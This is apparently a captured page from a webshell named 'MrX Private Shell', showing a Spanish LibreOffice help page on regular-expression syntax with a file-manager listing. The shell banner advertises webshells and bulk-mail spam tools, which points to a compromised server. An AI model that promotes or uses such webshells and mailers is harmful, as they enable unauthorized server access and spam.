__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<!DOCTYPE html>
<html lang="es" dir="ltr">
<head>
<base href="../../../../">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Lista de expresiones regulares</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="es/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="es/bookmarks.js" defer></script><script type="text/javascript" src="es/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="es/text/shared/05/new_help.html"><div></div></a><a class="logo" href="es/text/shared/05/new_help.html"><p dir="auto">Ayuda de LibreOffice 25.2</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Módulo</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contenido</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Buscar en los marcadores de todos los módulos" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
<noscript><div id="WarnJS"><h1 dir="auto">Active JavaScript en el navegador para mostrar las páginas de ayuda de LibreOffice.</h1></div></noscript>
<a id="bm_id3146765"></a><meta itemprop="keywords" content="expresiones regulares, lista de">
<meta itemprop="keywords" content="expresiones regulares, salto de renglón">
<meta itemprop="keywords" content="expresiones regulares, párrafo vacío">
<meta itemprop="keywords" content="expresiones regulares, comienzo de palabra">
<meta itemprop="keywords" content="expresiones regulares, comienzo de párrafo">
<meta itemprop="keywords" content="expresiones regulares, fin de párrafo">
<meta itemprop="keywords" content="listas, expresiones regulares">
<meta itemprop="keywords" content="reemplazar, tabulaciones (expresiones regulares)">
<meta itemprop="keywords" content="tabulaciones, expresiones regulares">
<meta itemprop="keywords" content="concatenación, vea símbolo et">
<meta itemprop="keywords" content="símbolo et, vea también operadores">
<h1 id="hd_id3146765" dir="auto">
<a id="02100001"></a>Lista de expresiones regulares</h1>
<div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id5311440" dir="auto">Para una lista exhaustiva de metacaracteres y sintaxis admitidas, consulte la <a target="_blank" href="https://unicode-org.github.io/icu/userguide/strings/regexp.html#regular-expression-metacharacters">documentación sobre expresiones regulares de ICU</a> (en inglés).</p></div>
</div>
<br>
<span id="swlnappltextshared0102100001xml_1" class="switch">
  <span hidden="true" id="CALCtextshared0102100001xml_1" class="CALC">
    <div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id731721572578180" dir="auto">Cells with the empty string ("") are not equivalent to blank cells. When searching or calculating with text, the empty string "" is the text with length zero.</p></div>
</div>
<br>
  </span>
</span>
<table border="1" class="" cellpadding="0" cellspacing="0">
  <tr>
    <th rowspan="" colspan="" class="tableheadcell" dir="auto">
      <p id="par_id3149741" class="tableheadintable" dir="auto">Término</p>
    </th>
    <th rowspan="" colspan="" class="tableheadcell" dir="auto">
      <p id="par_id3155577" class="tableheadintable" dir="auto">Representación/uso</p>
    </th>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id6600543" class="tablecontentintable" dir="auto">Cualquier carácter</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id9824518.00000001" class="tablecontentintable" dir="auto">El carácter indicado, salvo que sea un metacarácter de expresiones regulares. La lista de metacaracteres aparece en esta tabla.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3152427" class="tablecontentintable" dir="auto">.</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3149031" class="tablecontentintable" dir="auto">Any single character except a line break or a paragraph break. For example, the search term "sh.rt" matches both "shirt" and "short".</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3154682" class="tablecontentintable" dir="auto">^</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3155351" class="tablecontentintable" dir="auto">The beginning of a paragraph or cell. Special objects such as empty fields or character-anchored frames, at the beginning of a paragraph are ignored. Example: "^Peter" matches the word "Peter" only when it is the first word of a paragraph.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3159194" class="tablecontentintable" dir="auto">$</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3152542" class="tablecontentintable" dir="auto">The end of a paragraph or cell. Special objects such as empty fields or character-anchored frames at the end of a paragraph are ignored. Example: "Peter$" matches only when the word "Peter" is the last word of a paragraph, note "Peter" cannot be followed by a period.</p>
      <p id="par_id3152543" class="tablecontentintable" dir="auto">$ por sí solo coincide con el final de un párrafo. De esta manera, es posible buscar y reemplazar saltos de párrafo.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3156414" class="tablecontentintable" dir="auto">*</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3155555" class="tablecontentintable" dir="auto">Zero or more of the regular expression term immediately preceding it. For example, "Ab*c" matches "Ac", "Abc", "Abbc", "Abbbc", and so on.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3147399" class="tablecontentintable" dir="auto">+</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3157958" class="tablecontentintable" dir="auto">One or more of the regular expression term immediately preceding it. For example, "AX.+4" finds "AXx4", but not "AX4".</p>
        <p id="par_id3145313" class="tablecontentintable" dir="auto">The longest possible string that matches this regular expression in a paragraph is always matched. If the paragraph contains the string "AX 4 AX4", the entire passage is highlighted.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3143267" class="tablecontentintable" dir="auto">?</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153684" class="tablecontentintable" dir="auto">Zero or one of the regular expression term immediately preceding it. For example, "Texts?" matches "Text" and "Texts" and "x(ab|c)?y" finds "xy", "xaby", or "xcy".</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3166410" class="tablecontentintable" dir="auto">\</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3147209" class="tablecontentintable" dir="auto">The special character that follows it is interpreted as a normal character and not as a regular expression meta character (except for the combinations "\n", "\t", "\b", "\&gt;" and "\&lt;"). For example, "tree\." matches "tree.", not "treed" or "trees".</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3152945" class="tablecontentintable" dir="auto">\n</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153700" class="tablecontentintable" dir="auto">When entered in the <span class="widget">Find</span> text box, finds a line break that was inserted with the <span class="keycode">Shift+Enter</span> key combination in Writer, or the <span class="keycode">Ctrl+Enter</span> key combination in a Calc cell.</p>
        <p id="par_id731559575258580" class="tablecontentintable" dir="auto">Cuando se introduce en el cuadro de texto <span class="widget">Reemplazar</span> en Writer, inserta un salto de párrafo que se podría insertar con las teclas <span class="keycode">Intro</span> o <span class="keycode">Retorno</span>. No tiene ningún significado especial en Calc, donde se procesa de forma literal.</p>
        <p id="par_id631559575338134" class="tablecontentintable" dir="auto">To change line breaks into paragraph breaks in Writer, enter \n in both the <span class="widget">Find</span> and <span class="widget">Replace</span> boxes, and then perform a search and replace.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153258" class="tablecontentintable" dir="auto">\t</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3157809" class="tablecontentintable" dir="auto">Un carácter tabulador. Puede utilizarse también en el cuadro <span class="widget">Reemplazar</span>.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3150670" class="tablecontentintable" dir="auto">\b</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153666" class="tablecontentintable" dir="auto">A word boundary. For example, "\bbook" matches "bookmark" and "book" but not "checkbook" whereas "book\b" matches "checkbook" and "book" but not "bookmark".</p>
        <p id="par_id851559575484466" class="tablecontentintable" dir="auto">Observe que esta forma sustituye a las obsoletas «\&gt;» (encontrar fin de palabra) y «\&lt;» (encontrar comienzo de palabra), aunque estas últimas siguen funcionando por ahora.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id381726590074383" class="tablecontentintable" dir="auto">\w</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id281726590074384" class="tablecontentintable" dir="auto">Match a word character.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id41726590155814" class="tablecontentintable" dir="auto">\W</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id831726590155815" class="tablecontentintable" dir="auto">Match a non-word character.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3149576" class="tablecontentintable" dir="auto">^$</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3151245" class="tablecontentintable" dir="auto">Localiza un párrafo vacío.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3148550" class="tablecontentintable" dir="auto">^.</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3159413" class="tablecontentintable" dir="auto">Encuentra el primer carácter de un párrafo.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3147282" class="tablecontentintable" dir="auto">&amp; o $0</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153961" class="tablecontentintable" dir="auto">Añade la cadena de caracteres encontrada por los criterios de búsqueda del cuadro <span class="widget">Buscar</span> al término del cuadro <span class="widget">Reemplazar</span> cuando realice un reemplazo.</p>
        <p id="par_id3149650" class="tablecontentintable" dir="auto">Por ejemplo, si escribe «cama» en el cuadro <span class="widget">Buscar</span> y «&amp;león» en el cuadro <span class="widget">Reemplazar</span>, la palabra «cama» se sustituye por «camaleón».</p>
        <p id="par_id3150543" class="tablecontentintable" dir="auto">También puede introducirse un signo de «&amp;» en el cuadro <span class="widget">Reemplazar</span> para modificar los <span class="emph">atributos</span> o el <span class="emph">formato</span> de la cadena de caracteres que haya encontrado la búsqueda.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3145419" class="tablecontentintable" dir="auto">[...]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3154630" class="tablecontentintable" dir="auto">Any single occurrence of any one of  the characters that are between the brackets. For example: "[abc123]" matches the characters ‘a’, ‘b’,  ’c’, ‘1’, ‘2’ and ‘3’. "[a-e]" matches single occurrences of the characters a through e, inclusive (the range must be specified with the character having the smallest Unicode code number first). "[a-eh-x]" matches any single occurrence of the characters that are in the ranges ‘a’ through ‘e’ and ‘h’ through ‘x’.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3156293" class="tablecontentintable" dir="auto">[^...]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3149167" class="tablecontentintable" dir="auto">Any single occurrence of a character, including Tab, Space and Line Break characters, that is not in the list of characters specified inclusive ranges are permitted. For example "[^a-syz]" matches all characters not in the inclusive range ‘a’ through ‘s’ or the characters ‘y’ and ‘z’.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3156543" class="tablecontentintable" dir="auto">\uXXXX</p>
        <p id="par_id3156544" class="tablecontentintable" dir="auto">\UXXXXXXXX</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153768" class="tablecontentintable" dir="auto">El carácter que representa el código hexadecimal Unicode de cuatro dígitos (XXXX).</p>
        <p id="par_id3153769" class="tablecontentintable" dir="auto">El carácter que representa un código hexadecimal Unicode de ocho dígitos (XXXXXXXX).</p>
        <div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id3159252" dir="auto">Para algunos tipos de letra de símbolos, el símbolo (glifo) que se ve en pantalla puede parecer relacionado a un código Unicode diferente del que en realidad se utiliza en el tipo de letra. El código Unicode puede consultarse mediante la opción <span class="menuitem">Insertar ▸ Carácter especial</span> o al emplear el <a target="_top" href="es/text/shared/04/01010000.html#unicode_shortcut">atajo de conversión de Unicode</a>.</p></div>
</div>
<br>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id821680694984368" class="tablecontentintable" dir="auto"> \N{NOMBRE DE CARÁCTER UNICODE}</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id271680694984369" class="tablecontentintable" dir="auto">Match the Unicode named character.</p>
      <p id="par_id911680695810483" class="paragraphintable" dir="auto">Some remarkable Unicode named characters are   <span class="literal">SPACE</span>, <span class="literal">NO-BREAK SPACE</span>, <span class="literal">SOFT HYPHEN</span>, <span class="literal">ACUTE ACCENT</span>, <span class="literal">CIRCUMFLEX ACCENT</span>, <span class="literal">GRAVE ACCENT</span>.</p>
      <div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id361680709269316" dir="auto">Los nombres de los caracteres Unicode pueden buscarse y visualizarse mediante <span class="menuitem">Insertar ▸ Carácter especial</span>.</p></div>
</div>
<br>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153951" class="tablecontentintable" dir="auto">|</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3154985" class="tablecontentintable" dir="auto">El operador que delimita alternativas. Encuentra los términos previo y posterior al «|». Por ejemplo, «esto|eso» encuentra ocurrencias tanto de «esto» como de «eso».</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3147376" class="tablecontentintable" dir="auto">{N}</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3150103" class="tablecontentintable" dir="auto">The post-fix repetition operator that specifies an exact number of occurrences ("N") of the regular expression term immediately preceding it must be present for a match to occur. For example, "tre{2}" matches "tree".</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3151289" class="tablecontentintable" dir="auto">{N,M}</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3147317" class="tablecontentintable" dir="auto">The post-fix repetition operator that specifies a range (minimum of "N" to a maximum of "M") of occurrences of the regular expression term immediately preceding it that can be present for a match to occur. For example, "tre{1,2}" matches "tre" and "tree".</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id4870754" class="tablecontentintable" dir="auto">{N,}</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id843836" class="tablecontentintable" dir="auto">The post-fix repetition operator that specifies a range (minimum "N" to an unspecified maximum) of occurrences of the regular expression term immediately preceding it that can be present for a match to occur. (The maximum number of occurrences is limited only by the size of the document). For example, "tre{2,}" matches "tree", "treee", and "treeeee".</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3148616" class="tablecontentintable" dir="auto">(...)</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id91559576682961" class="paragraphintable" dir="auto">The grouping construct that serves three purposes.</p>
        <ol itemprop="HowTo" itemscope="true" itemtype="http://schema.org/HowToSection" dir="auto">
            <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
                <p id="par_id871559576709007" class="listitemintable" dir="auto">To enclose a set of ‘|’ alternatives. For example, the regular expression "b(oo|ac)k" matches both "book" and "back".</p>
            </li>
            <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
                <p id="par_id891559576747109" class="listitemintable" dir="auto">To group terms in a complex expression to be operated on by the post-fix operators: "*", "+" and "?" along with the post-fix repetition operators. For example, the regular expression "a(bc)?d" matches both "ad" and "abcd"; "M(iss){2}ippi" matches "Mississippi".</p>
            </li>
            <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
                <p id="par_id801559576780692" class="listitemintable" dir="auto">To reference the matched sub string inside the parentheses for later use. The "\N" construct is used in the <span class="widget">Find</span> box, the "$N" construct is used in the <span class="widget">Replace</span> box. "N" being a digit, the reference to the first match is represented by "\1" in the <span class="widget">Find</span> box and by "$1" in the <span class="widget">Replace</span> box; "\2" and "$2" reference to the second matched, and so on.</p>
                </li>
        </ol>
        <p id="par_id951559576846997" class="paragraphintable" dir="auto">For example, the regular expression "(890)xy\1z\1" matches "890xy890z890".</p>
        <p id="par_id561559576865734" class="paragraphintable" dir="auto">With the regular expression "(fruit|truth)\b" in the Find box, and the replacement expression "$1ful" in the Replace box, occurrences of "fruit" and "truth" are replaced with "fruitful" and "truthful" respectively. Note: "\b" prevents "fruitfully" or "truthfully" from matching.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3154790" class="tablecontentintable" dir="auto">[:alpha:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3147397" class="tablecontentintable" dir="auto">Representa un carácter alfabético. Use <span class="emph">[:alpha:]</span> para encontrar uno.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3152855" class="tablecontentintable" dir="auto">\d</p>
        <p id="par_id3152885" class="tablecontentintable" dir="auto">[:digit:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3150010" class="tablecontentintable" dir="auto">Representa un dígito decimal. Use <span class="emph">[:digit:]</span> para encontrar uno.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153743" class="tablecontentintable" dir="auto">[:alnum:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3153281" class="tablecontentintable" dir="auto">Representa un carácter alfanumérico ([:alpha:] y [:digit]).</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3153722" class="tablecontentintable" dir="auto">\s</p>
        <p id="par_id3153726" class="tablecontentintable" dir="auto">[:space:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3150961" class="tablecontentintable" dir="auto">Representa un espacio (pero no otros caracteres de espacios en blanco).</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3150486" class="tablecontentintable" dir="auto">[:print:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3150872" class="tablecontentintable" dir="auto">Representa un carácter que se puede imprimir.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3155854" class="tablecontentintable" dir="auto">[:cntrl:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3152576" class="tablecontentintable" dir="auto">Representa un carácter que no se puede imprimir.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3149958" class="tablecontentintable" dir="auto">[:lower:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3145730" class="tablecontentintable" dir="auto">Representa un carácter en minúscula si en <span class="emph">Opciones</span> se ha seleccionado <span class="emph">Distinguir mayúsculas y minúsculas</span>.</p>
    </td>
  </tr>
  <tr>
    <td rowspan="" colspan="" dir="auto">
        <p id="par_id3148455" class="tablecontentintable" dir="auto">[:upper:]</p>
    </td>
    <td rowspan="" colspan="" dir="auto">
      <p id="par_id3150092" class="tablecontentintable" dir="auto">Representa un carácter mayúsculo si se ha activado la opción <span class="emph">Distinguir mayúsculas y minúsculas</span> en <span class="emph">Opciones</span>.</p>
    </td>
  </tr>
</table>
<br>
<p id="par_id261559577375317" class="paragraph" dir="auto">Estos términos pueden combinarse para formar expresiones regulares complejas y sofisticadas para búsquedas, como se muestra en los ejemplos de más abajo.</p>
<h2 id="hd_id5311441" dir="auto">Ejemplos</h2>

<table border="1" class="" cellpadding="0" cellspacing="0">
    <tr>
        <th rowspan="" colspan="" class="tableheadcell" dir="auto">
            <p id="par_id901559577400292" class="tableheadintable" dir="auto">Expresión</p>
        </th>
        <th rowspan="" colspan="" class="tableheadcell" dir="auto">
            <p id="par_id381559577400292" class="tableheadintable" dir="auto">Significado</p>
        </th>
    </tr>
    <tr>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id641559577400292" class="tablecontentintable" dir="auto">^$</p>
        </td>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id621559577542068" class="tablecontentintable" dir="auto">Un párrafo vacío.</p>
            <p id="par_id311559577563701" class="tablecontentintable" dir="auto"><a id="startpar"></a>^ significa que la correspondencia debe ser al inicio de un párrafo;</p>
            <p id="par_id391559577592658" class="tablecontentintable" dir="auto"><a id="endpar"></a>$ specifies that a paragraph mark or the end of a cell must follow the matched string.</p>
        </td>
    </tr>
    <tr>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id251559577837101" class="tablecontentintable" dir="auto">^.</p>
        </td>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id771559577837101" class="tablecontentintable" dir="auto">El primer carácter de un párrafo.</p>
            <p id="par_id871559577915900" class="tablecontentintable" dir="auto">^ significa que la correspondencia debe ser al inicio de un párrafo; </p>
            <p id="par_id171559577924884" class="tablecontentintable" dir="auto">. especifica cualquier carácter individual.</p>
        </td>
    </tr>
    <tr>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id721559577961403" class="tablecontentintable" dir="auto">e([:digit:])?</p>
        </td>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id471559577961403" class="tablecontentintable" dir="auto">Encuentra «e» en sí misma o «e» seguida por un dígito.</p>
            <p id="par_id421559578050163" class="tablecontentintable" dir="auto">e specifies the character "e",</p>
            <p id="par_id591559578054502" class="tablecontentintable" dir="auto"><a id="digit"></a>[:digit:] specifies any decimal digit,</p>
            <p id="par_id341559578058972" class="tablecontentintable" dir="auto">? specifies zero or one occurrences of [:digit:].</p>
        </td>
    </tr>
    <tr>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id191559578087559" class="tablecontentintable" dir="auto">^([:digit:])$</p>
        </td>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id551559578087559" class="tablecontentintable" dir="auto">Matches a paragraph or cells containing exactly one digit.</p>
            <p id="par_id721559578137006" class="tablecontentintable" dir="auto">^ significa que la correspondencia debe ser al inicio de un párrafo;</p>
            <p id="par_id941559578151564" class="tablecontentintable" dir="auto">[:digit:] specifies any decimal digit,</p>
            <p id="par_id791559578157006" class="tablecontentintable" dir="auto">$ specifies that a paragraph mark or the end of a cell must follow the matched string.</p>
        </td>
    </tr>
    <tr>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id651559578184372" class="tablecontentintable" dir="auto">^[:digit:]{3}$</p>
        </td>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id771559578184372" class="tablecontentintable" dir="auto">Matches a paragraph or cell containing only three digit numbers</p>
            <p id="par_id631559578489930" class="tablecontentintable" dir="auto">^ significa que la correspondencia debe ser al inicio de un párrafo;</p>
            <p id="par_id551559578496775" class="tablecontentintable" dir="auto">[:digit:] specifies any decimal digit,</p>
            <p id="par_id401559578501329" class="tablecontentintable" dir="auto">{3} specifies that [:digit:] must occur three times,</p>
            <p id="par_id251559578508215" class="tablecontentintable" dir="auto">$ specifies that a paragraph mark or the end of a cell must follow the matched string.</p>
        </td>
    </tr>
    <tr>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id131559578728924" class="tablecontentintable" dir="auto">\bconst(itu|ruc)ción\b</p>
        </td>
        <td rowspan="" colspan="" dir="auto">
            <p id="par_id891559578728925" class="tablecontentintable" dir="auto">Encuentra las palabras «constitución» y «construcción» mas no la palabra «constitucional».</p>
            <p id="par_id381559578787403" class="tablecontentintable" dir="auto">\b specifies that the match must begin at a word boundary,</p>
            <p id="par_id721559578792194" class="tablecontentintable" dir="auto">const specifies the characters "const",</p>
            <p id="par_id941559578797721" class="tablecontentintable" dir="auto">( starts the group,</p>
            <p id="par_id641559578802269" class="tablecontentintable" dir="auto">itu specifies the characters "itu",</p>
            <p id="par_id271559578807054" class="tablecontentintable" dir="auto">| specifies the alternative,</p>
            <p id="par_id801559578813944" class="tablecontentintable" dir="auto">ruc specifies the characters "ruc",</p>
            <p id="par_id421559578820595" class="tablecontentintable" dir="auto">) ends the group,</p>
            <p id="par_id621559578825464" class="tablecontentintable" dir="auto">tion specifies the characters "tion",</p>
            <p id="par_id91559578832058" class="tablecontentintable" dir="auto">\b specifies that the match must end at a word boundary.</p>
        </td>
    </tr>
</table>
<br>

<a id="relatedtopics"></a><div class="relatedtopics">
<p class="related" itemprop="mentions" dir="auto"><a id="related"></a><span class="emph">Temas relacionados</span></p>
<div class="relatedbody" itemprop="mentions">
  <p id="par_id421680698947038" class="paragraph" dir="auto"><a target="_blank" href="https://unicode-org.github.io/icu/userguide/strings/regexp.html#regular-expression-metacharacters">ICU Regular Expressions documentation</a></p>
  <div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="es/text/shared/01/02100000.html">Find &amp; Replace</a></p></div>
<span id="swlnappltextshared0102100001xml_2" class="switch">
<span hidden="true" id="WRITERtextshared0102100001xml_2" class="WRITER"><div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="es/text/swriter/guide/search_regexp.html">Utilizar expresiones regulares en búsquedas de texto</a></p></div>
  <div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="es/text/swriter/guide/finding.html">Buscar y reemplazar en Writer</a></p></div>
</span>
</span>
<p id="par_id1751457" class="paragraph" dir="auto"><a target="_blank" href="https://wiki.documentfoundation.org/Documentation/How_Tos/Regular_Expressions_in_Writer">Wiki page about regular expressions in Writer</a></p>
<p id="par_id5483870" class="paragraph" dir="auto"><a target="_blank" href="https://wiki.documentfoundation.org/Documentation/How_Tos/Regular_Expressions_in_Calc">Wiki page about regular expressions in Calc</a></p>
</div>
</div>
</div>
<div id="DonationFrame"></div>
<footer><h2 style="text-align: center;"><a href="https://books.libreoffice.org" target="_blank">Libros de LibreOffice</a></h2>
<div class="noteicon" dir="auto" style="display:flex;justify-content:center;flex-wrap:wrap;row-gap:15px;">
<img src="media/navigation/libo-writer.svg" alt="Writer Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-calc.svg" alt="Calc Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-impress.svg" alt="Impress Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-draw.svg" alt="Draw Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-base.svg" alt="Base Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-math.svg" alt="Math Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-symbol-black.svg" alt="Getting Started Icon" style="width:60px;height:60px;">
</div>
<div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/shared/01/02100001.xhp" target="_blank">/text/shared/01/02100001.xhp</a></p>
<p dir="auto">Title is: Lista de expresiones regulares</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Filemanager

Name Type Size Permission Actions
01010000.html File 16.3 KB 0644
01010001.html File 5.06 KB 0644
01010200.html File 6.45 KB 0644
01010201.html File 8.72 KB 0644
01010202.html File 8.37 KB 0644
01010203.html File 6.93 KB 0644
01010300.html File 7.25 KB 0644
01010301.html File 6.02 KB 0644
01010302.html File 5.32 KB 0644
01010303.html File 8.53 KB 0644
